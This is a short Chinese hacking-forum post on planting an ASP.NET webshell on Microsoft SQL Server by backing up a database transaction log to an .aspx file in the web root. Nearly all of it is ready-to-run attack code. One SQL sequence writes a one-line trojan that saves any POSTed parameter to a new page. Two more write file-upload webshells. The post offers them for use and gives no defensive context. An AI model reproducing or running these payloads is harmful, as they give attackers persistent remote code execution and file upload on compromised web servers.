ASP.NET备份db日志获得webshell - 华夏黑客同盟

以下是代码片段：
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ')
backup log pubs to disk = 'd:\haha.aspx'

这个和asp的一样，客户端post一个变量m把木马代码丢在变量m里面就行了。这个是类似asp的一句话木马的。

网上的asp.net的上传文件程序

以下是代码片段：
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" OnServerClick="bc" /></form>')
backup log pubs to disk = 'c:\inetpub\wwwroot\ha.aspx'

加入错误捕获

以下是代码片段：
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\T ' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bp(object o,EventArgs e) {string u="files";string filename;try {int pos = f.PostedFile.FileName.LastIndexOf("\\");if (pos > 0) filename = f.PostedFile.FileName.Substring(pos + 1);else filename = f.PostedFile.FileName;Response.Write(Server.MapPath(u) + "\\" + filename);f.PostedFile.SaveAs(Server.MapPath("filename"));} catch (Exception ex) {Response.Write("Error: " + ex.Message.ToString());}}</script><form method="post" runat="server"><input type="file" id="f" runat="server" size="50"/><input type="submit" value="s" runat="Server" OnServerClick="bp" /></form>')
backup log pubs to disk = 'd:\haha2.aspx'